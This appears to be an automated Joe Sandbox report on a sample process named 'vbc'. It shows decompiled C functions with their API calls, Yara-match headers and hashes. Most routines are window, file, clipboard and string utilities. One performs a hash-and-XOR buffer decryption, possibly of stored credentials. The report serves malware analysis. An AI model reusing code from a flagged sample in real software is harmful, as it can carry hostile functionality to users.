                                                                • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 4021364944-3614832568
                                                              • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                              • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                              • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                              • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E00406491(void* __edx, struct HWND__* _a4) {
                                                              				int _v8;
                                                              				struct tagRECT _v24;
                                                              				int _t17;
                                                              				void* _t36;
                                                              				struct HDC__* _t38;
                                                              
                                                              				_t36 = __edx;
                                                              				_t38 = GetDC(0);
                                                              				_t17 = GetDeviceCaps(_t38, 8);
                                                              				_v8 = GetDeviceCaps(_t38, 0xa);
                                                              				ReleaseDC(0, _t38);
                                                              				GetWindowRect(_a4,  &_v24);
                                                              				asm("cdq");
                                                              				asm("cdq");
                                                              				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                                              			}








                                                              0x00406491
                                                              0x004064a8
                                                              0x004064ad
                                                              0x004064b9
                                                              0x004064bc
                                                              0x004064c9
                                                              0x004064e1
                                                              0x004064f5
                                                              0x00406511

                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0040649C
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                              • ReleaseDC.USER32 ref: 004064BC
                                                              • GetWindowRect.USER32 ref: 004064C9
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CapsDeviceWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 3197862061-0
                                                              • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                              • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                              • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                              • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                              				long _v8;
                                                              				void _v8199;
                                                              				char _v8200;
                                                              				void _v24582;
                                                              				short _v24584;
                                                              
                                                              				E004118A0(0x6004, __ecx);
                                                              				_v24584 = 0;
                                                              				memset( &_v24582, 0, 0x3ffe);
                                                              				_v8200 = 0;
                                                              				memset( &_v8199, 0, 0x1fff);
                                                              				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                              				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                              				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                              			}








                                                              0x00403a95
                                                              0x00403aab
                                                              0x00403ab2
                                                              0x00403ac5
                                                              0x00403acb
                                                              0x00403ae2
                                                              0x00403b01
                                                              0x00403b2d

                                                              APIs
                                                              • memset.MSVCRT ref: 00403AB2
                                                              • memset.MSVCRT ref: 00403ACB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                              • strlen.MSVCRT ref: 00403B13
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                              • String ID:
                                                              • API String ID: 1786725549-0
                                                              • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                              • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                              • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                              • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040AC8A(void* __eax, void* __ebx) {
                                                              				char _v264;
                                                              				char _v524;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				long _t13;
                                                              				void* _t18;
                                                              				int _t19;
                                                              				long _t20;
                                                              				void* _t27;
                                                              				void* _t31;
                                                              
                                                              				_t27 = __ebx;
                                                              				_t31 = __eax;
                                                              				_t13 = GetTempPathA(0x104,  &_v524);
                                                              				_t32 = _t13;
                                                              				if(_t13 == 0) {
                                                              					GetWindowsDirectoryA( &_v524, 0x104);
                                                              				}
                                                              				_v264 = 0;
                                                              				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                              				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
                                                              				if(_t18 != 0) {
                                                              					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                              					_t34 = _t19;
                                                              					if(_t19 == 0) {
                                                              						_t20 = GetLastError();
                                                              					} else {
                                                              						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
                                                              					}
                                                              					if(_t20 != 0) {
                                                              						E00405F41(_t20,  *(_t31 + 0x108));
                                                              					}
                                                              					return DeleteFileA( &_v264);
                                                              				}
                                                              				return _t18;
                                                              			}













                                                              0x0040ac8a
                                                              0x0040ac95
                                                              0x0040aca4
                                                              0x0040acaa
                                                              0x0040acac
                                                              0x0040acb6
                                                              0x0040acb6
                                                              0x0040acd1
                                                              0x0040acd8
                                                              0x0040ace9
                                                              0x0040acf0
                                                              0x0040acf8
                                                              0x0040acfe
                                                              0x0040ad00
                                                              0x0040ad11
                                                              0x0040ad02
                                                              0x0040ad09
                                                              0x0040ad0e
                                                              0x0040ad19
                                                              0x0040ad21
                                                              0x0040ad26
                                                              0x00000000
                                                              0x0040ad2e
                                                              0x0040ad37

                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                              • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                              • OpenClipboard.USER32(?), ref: 0040ACF8
                                                              • GetLastError.KERNEL32 ref: 0040AD11
                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                              • String ID:
                                                              • API String ID: 2014771361-0
                                                              • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                              • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                              • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                              • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				char* _t34;
                                                              				signed int _t35;
                                                              				void* _t36;
                                                              				void* _t37;
                                                              
                                                              				_t34 = __edi;
                                                              				_v260 = 0;
                                                              				memset( &_v259, 0, 0xfe);
                                                              				_t37 = _t36 + 0xc;
                                                              				 *__edi = 0;
                                                              				_t35 = 0;
                                                              				do {
                                                              					_push( *(_t35 + _a4) & 0x000000ff);
                                                              					sprintf( &_v260, "%2.2X");
                                                              					_t37 = _t37 + 0xc;
                                                              					if(_t35 > 0) {
                                                              						strcat(_t34, " ");
                                                              					}
                                                              					if(_a8 > 0) {
                                                              						asm("cdq");
                                                              						if(_t35 % _a8 == 0) {
                                                              							strcat(_t34, "  ");
                                                              						}
                                                              					}
                                                              					strcat(_t34,  &_v260);
                                                              					_t35 = _t35 + 1;
                                                              				} while (_t35 < 0x80);
                                                              				return _t34;
                                                              			}









                                                              0x00406585
                                                              0x0040659d
                                                              0x004065a4
                                                              0x004065a9
                                                              0x004065ac
                                                              0x004065af
                                                              0x004065b1
                                                              0x004065b8
                                                              0x004065c5
                                                              0x004065ca
                                                              0x004065cf
                                                              0x004065d7
                                                              0x004065dd
                                                              0x004065e2
                                                              0x004065e6
                                                              0x004065ec
                                                              0x004065f4
                                                              0x004065fa
                                                              0x004065ec
                                                              0x00406603
                                                              0x00406608
                                                              0x00406610
                                                              0x00406617

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 582077193-791839006
                                                              • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                              • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                              • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                              • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E0040FEED(intOrPtr* __edi) {
                                                              				void* __esi;
                                                              				signed int _t9;
                                                              				intOrPtr* _t16;
                                                              				intOrPtr _t18;
                                                              				intOrPtr _t19;
                                                              				intOrPtr _t20;
                                                              				intOrPtr _t21;
                                                              				intOrPtr _t22;
                                                              
                                                              				_t16 = __edi;
                                                              				_t9 =  *(__edi + 0x1c);
                                                              				 *__edi = 0x414288;
                                                              				if(_t9 != 0) {
                                                              					_push(_t9);
                                                              					L004115D6();
                                                              					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                              				}
                                                              				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                              				if(_t18 != 0) {
                                                              					_t9 = E00406B5B(_t18);
                                                              					_push(_t18);
                                                              					L004115D6();
                                                              				}
                                                              				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
                                                              				if(_t19 != 0) {
                                                              					_t9 = E00406B5B(_t19);
                                                              					_push(_t19);
                                                              					L004115D6();
                                                              				}
                                                              				_t20 =  *((intOrPtr*)(_t16 + 0x458));
                                                              				if(_t20 != 0) {
                                                              					_t9 = E00406B5B(_t20);
                                                              					_push(_t20);
                                                              					L004115D6();
                                                              				}
                                                              				_t21 =  *((intOrPtr*)(_t16 + 0x454));
                                                              				if(_t21 != 0) {
                                                              					_t9 = E00406A4E(_t21);
                                                              					_push(_t21);
                                                              					L004115D6();
                                                              				}
                                                              				_t22 =  *((intOrPtr*)(_t16 + 0x450));
                                                              				if(_t22 != 0) {
                                                              					_t9 = E00406A4E(_t22);
                                                              					_push(_t22);
                                                              					L004115D6();
                                                              				}
                                                              				return _t9;
                                                              			}











                                                              0x0040feed
                                                              0x0040feed
                                                              0x0040fef2
                                                              0x0040fef8
                                                              0x0040fefa
                                                              0x0040fefb
                                                              0x0040ff00
                                                              0x0040ff04
                                                              0x0040ff06
                                                              0x0040ff0e
                                                              0x0040ff10
                                                              0x0040ff15
                                                              0x0040ff16
                                                              0x0040ff1b
                                                              0x0040ff1c
                                                              0x0040ff24
                                                              0x0040ff26
                                                              0x0040ff2b
                                                              0x0040ff2c
                                                              0x0040ff31
                                                              0x0040ff32
                                                              0x0040ff3a
                                                              0x0040ff3c
                                                              0x0040ff41
                                                              0x0040ff42
                                                              0x0040ff47
                                                              0x0040ff48
                                                              0x0040ff50
                                                              0x0040ff52
                                                              0x0040ff57
                                                              0x0040ff58
                                                              0x0040ff5d
                                                              0x0040ff5e
                                                              0x0040ff66
                                                              0x0040ff68
                                                              0x0040ff6d
                                                              0x0040ff6e
                                                              0x0040ff73
                                                              0x0040ff75

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                              • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                              • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                              • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E0040173B(void* __ebx) {
                                                              				struct tagRECT _v20;
                                                              				struct tagPAINTSTRUCT _v84;
                                                              
                                                              				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                              				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                              				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                              				asm("movsd");
                                                              				asm("movsd");
                                                              				asm("movsd");
                                                              				asm("movsd");
                                                              				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                              				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                              			}





                                                              0x0040174a
                                                              0x00401761
                                                              0x0040176b
                                                              0x00401773
                                                              0x00401774
                                                              0x00401778
                                                              0x0040177d
                                                              0x0040178d
                                                              0x004017a3

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                              • String ID:
                                                              • API String ID: 19018683-0
                                                              • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                              • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                              • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                              • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
                                                              				signed int _v8;
                                                              				char _v16;
                                                              				char _v24;
                                                              				char _v116;
                                                              				void _v1156;
                                                              				char _v1164;
                                                              				void _v1171;
                                                              				char _v1172;
                                                              				char _v2188;
                                                              				void _v2195;
                                                              				void _v2196;
                                                              				void _v3251;
                                                              				void _v3252;
                                                              				char _v4020;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t96;
                                                              				char _t105;
                                                              				intOrPtr _t112;
                                                              				void* _t115;
                                                              				signed int _t116;
                                                              				int _t121;
                                                              				signed int* _t122;
                                                              				void* _t124;
                                                              				void* _t125;
                                                              				signed int _t128;
                                                              				signed int* _t129;
                                                              				void* _t132;
                                                              
                                                              				_t116 = __edx;
                                                              				_t105 = 0;
                                                              				_v2196 = 0;
                                                              				memset( &_v2195, 0, 0x3ff);
                                                              				_v3252 = 0;
                                                              				memset( &_v3251, 0, 0x41e);
                                                              				_v1172 = 0;
                                                              				memset( &_v1171, 0, 0x41e);
                                                              				_a8 = E00410E8A(_a8,  &_v2196);
                                                              				_t121 = strlen(_a4);
                                                              				if(_a8 > 8) {
                                                              					_t137 = _t121;
                                                              					if(_t121 > 0) {
                                                              						memcpy( &_v3252, _a4, _t121);
                                                              						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
                                                              						E0040BC49( &_v116);
                                                              						_t19 = _t121 + 8; // 0x8
                                                              						E0040BC6D(_t19,  &_v116,  &_v3252);
                                                              						_t127 =  &_v116;
                                                              						E0040BD0B(_t121,  &_v116,  &_v1172);
                                                              						_t23 = _t121 + 8; // 0x8
                                                              						memcpy( &_v1156,  &_v3252, _t23);
                                                              						E0040BC49( &_v116);
                                                              						_t27 = _t121 + 0x18; // 0x18
                                                              						E0040BC6D(_t27, _t127,  &_v1172);
                                                              						E0040BD0B(_t121, _t127,  &_v24);
                                                              						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
                                                              						_t122 = _a12;
                                                              						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
                                                              						_t112 = _a8;
                                                              						_t128 = 0;
                                                              						if(_t112 >= 0x18) {
                                                              							_t37 = _t112 - 0x18; // -16
                                                              							asm("cdq");
                                                              							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
                                                              						}
                                                              						if(_t128 > _t105) {
                                                              							_a4 =  &_v2188;
                                                              							_t125 = _t122 + 8;
                                                              							_v8 = _t128;
                                                              							do {
                                                              								E004053D6(_a4, _t112, _t125,  &_v4020);
                                                              								_a4 = _a4 + 8;
                                                              								_t125 = _t125 + 8;
                                                              								_t45 =  &_v8;
                                                              								 *_t45 = _v8 - 1;
                                                              								_pop(_t112);
                                                              							} while ( *_t45 != 0);
                                                              							_t112 = _a8;
                                                              						}
                                                              						_t96 = 8 + _t128 * 8;
                                                              						_t50 = _t96 + 8; // 0x8
                                                              						if(_t50 > _t112) {
                                                              							_t51 = _t112 - 8; // 0x0
                                                              							_t96 = _t51;
                                                              						}
                                                              						if(_t96 > _t105) {
                                                              							_t129 = _a12;
                                                              							_t124 =  &_v2188 - _t129;
                                                              							_t115 = _t96;
                                                              							do {
                                                              								 *_t129 =  *_t129 ^  *(_t124 + _t129);
                                                              								_t129 =  &(_t129[0]);
                                                              								_t115 = _t115 - 1;
                                                              							} while (_t115 != 0);
                                                              						}
                                                              						 *((char*)(_t96 + _a12)) = _t105;
                                                              						 *_a16 = 1;
                                                              						_t105 = 1;
                                                              					}
                                                              				}
                                                              				return _t105;
                                                              			}































                                                              0x00411366
                                                              0x00411372
                                                              0x00411381
                                                              0x00411387
                                                              0x0041139a
                                                              0x004113a0
                                                              0x004113ae
                                                              0x004113b4
                                                              0x004113cd
                                                              0x004113da
                                                              0x004113dc
                                                              0x004113e2
                                                              0x004113e4
                                                              0x004113f5
                                                              0x0041140b
                                                              0x00411413
                                                              0x0041141f
                                                              0x00411425
                                                              0x00411431
                                                              0x00411434
                                                              0x00411439
                                                              0x0041144b
                                                              0x00411452
                                                              0x0041145e
                                                              0x00411463
                                                              0x0041146c
                                                              0x00411488
                                                              0x0041148d
                                                              0x0041149a
                                                              0x0041149f
                                                              0x004114a5
                                                              0x004114aa
                                                              0x004114ac
                                                              0x004114af
                                                              0x004114ba
                                                              0x004114ba
                                                              0x004114bd
                                                              0x004114c5
                                                              0x004114c8
                                                              0x004114cb
                                                              0x004114ce
                                                              0x004114d8
                                                              0x004114dd
                                                              0x004114e1
                                                              0x004114e4
                                                              0x004114e4
                                                              0x004114e7
                                                              0x004114e7
                                                              0x004114ea
                                                              0x004114ea
                                                              0x004114ed
                                                              0x004114f4
                                                              0x004114f9
                                                              0x004114fb
                                                              0x004114fb
                                                              0x004114fb
                                                              0x00411500
                                                              0x00411502
                                                              0x0041150b
                                                              0x0041150d
                                                              0x0041150f
                                                              0x00411512
                                                              0x00411514
                                                              0x00411515
                                                              0x00411515
                                                              0x0041150f
                                                              0x0041151b
                                                              0x00411524
                                                              0x00411526
                                                              0x00411526
                                                              0x004113e4
                                                              0x0041152e

                                                              APIs
                                                              • memset.MSVCRT ref: 00411387
                                                              • memset.MSVCRT ref: 004113A0
                                                              • memset.MSVCRT ref: 004113B4
                                                                • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                              • strlen.MSVCRT ref: 004113D0
                                                              • memcpy.MSVCRT ref: 004113F5
                                                              • memcpy.MSVCRT ref: 0041140B
                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                              • memcpy.MSVCRT ref: 0041144B
                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpymemset$strlen
                                                              • String ID:
                                                              • API String ID: 2142929671-0
                                                              • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                              • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                              • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                              • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E004078FF(signed short __ebx) {
                                                              				signed int _t17;
                                                              				void* _t18;
                                                              				intOrPtr _t23;
                                                              				void* _t31;
                                                              				signed short _t39;
                                                              				signed int _t40;
                                                              				void* _t51;
                                                              				int _t56;
                                                              				void* _t57;
                                                              				int _t67;
                                                              
                                                              				_t39 = __ebx;
                                                              				if( *0x417540 == 0) {
                                                              					E0040787D();
                                                              				}
                                                              				_t40 =  *0x417538;
                                                              				_t17 = 0;
                                                              				if(_t40 <= 0) {
                                                              					L5:
                                                              					_t51 = 0;
                                                              				} else {
                                                              					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
                                                              						_t17 = _t17 + 1;
                                                              						if(_t17 < _t40) {
                                                              							continue;
                                                              						} else {
                                                              							goto L5;
                                                              						}
                                                              						goto L6;
                                                              					}
                                                              					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
                                                              				}
                                                              				L6:
                                                              				if(_t51 != 0) {
                                                              					L22:
                                                              					_t18 = _t51;
                                                              				} else {
                                                              					if((_t39 & 0x00010000) == 0) {
                                                              						if( *0x4171b8 == 0) {
                                                              							_push( *0x417548 - 1);
                                                              							_push( *0x41752c);
                                                              							_push(_t39);
                                                              							_push(E00407A55());
                                                              							goto L16;
                                                              						} else {
                                                              							strcpy(0x4172c0, "strings");
                                                              							_t31 = E00407D89(_t39,  *0x41752c);
                                                              							_t57 = _t57 + 0x10;
                                                              							if(_t31 == 0) {
                                                              								L14:
                                                              								_push( *0x417548 - 1);
                                                              								_push( *0x41752c);
                                                              								_push(_t39);
                                                              								goto L9;
                                                              							} else {
                                                              								_t56 = strlen( *0x41752c);
                                                              								if(_t56 == 0) {
                                                              									goto L14;
                                                              								}
                                                              							}
                                                              						}
                                                              					} else {
                                                              						_push( *0x417548 - 1);
                                                              						_push( *0x41752c);
                                                              						_push(_t39 & 0x0000ffff);
                                                              						L9:
                                                              						_push( *0x416b94);
                                                              						L16:
                                                              						_t56 = LoadStringA();
                                                              						_t67 = _t56;
                                                              					}
                                                              					if(_t67 <= 0) {
                                                              						L21:
                                                              						_t18 = 0x412466;
                                                              					} else {
                                                              						_t23 =  *0x41753c;
                                                              						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
                                                              							goto L21;
                                                              						} else {
                                                              							_t51 = _t23 +  *0x417528;
                                                              							_t10 = _t56 + 1; // 0x1
                                                              							memcpy(_t51,  *0x41752c, _t10);
                                                              							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
                                                              							 *( *0x417530 +  *0x417538 * 4) = _t39;
                                                              							 *0x417538 =  *0x417538 + 1;
                                                              							 *0x41753c =  *0x41753c + _t56 + 1;
                                                              							if(_t51 != 0) {
                                                              								goto L22;
                                                              							} else {
                                                              								goto L21;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t18;
                                                              			}













                                                              0x004078ff
                                                              0x00407906
                                                              0x00407908
                                                              0x00407908
                                                              0x0040790d
                                                              0x00407914
                                                              0x00407919
                                                              0x0040792b
                                                              0x0040792b
                                                              0x0040791b
                                                              0x0040791b
                                                              0x00407926
                                                              0x00407929
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407929
                                                              0x0040795f
                                                              0x0040795f
                                                              0x0040792d
                                                              0x0040792f
                                                              0x00407a50
                                                              0x00407a50
                                                              0x00407935
                                                              0x0040793b
                                                              0x0040796e
                                                              0x004079ba
                                                              0x004079bb
                                                              0x004079c1
                                                              0x004079c7
                                                              0x00000000
                                                              0x00407970
                                                              0x0040797a
                                                              0x00407986
                                                              0x0040798b
                                                              0x00407990
                                                              0x004079a4
                                                              0x004079aa
                                                              0x004079ab
                                                              0x004079b1
                                                              0x00000000
                                                              0x00407992
                                                              0x0040799d
                                                              0x004079a2
                                                              0x00000000
                                                              0x00000000
                                                              0x004079a2
                                                              0x00407990
                                                              0x0040793d
                                                              0x00407943
                                                              0x00407944
                                                              0x0040794d
                                                              0x0040794e
                                                              0x0040794e
                                                              0x004079c8
                                                              0x004079ce
                                                              0x004079d0
                                                              0x004079d0
                                                              0x004079d2
                                                              0x00407a49
                                                              0x00407a49
                                                              0x004079d4
                                                              0x004079d4
                                                              0x004079e3
                                                              0x00000000
                                                              0x004079f3
                                                              0x004079f9
                                                              0x004079fc
                                                              0x00407a07
                                                              0x00407a1d
                                                              0x00407a2b
                                                              0x00407a36
                                                              0x00407a42
                                                              0x00407a47
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407a47
                                                              0x004079e3
                                                              0x004079d2
                                                              0x00407a54

                                                              APIs
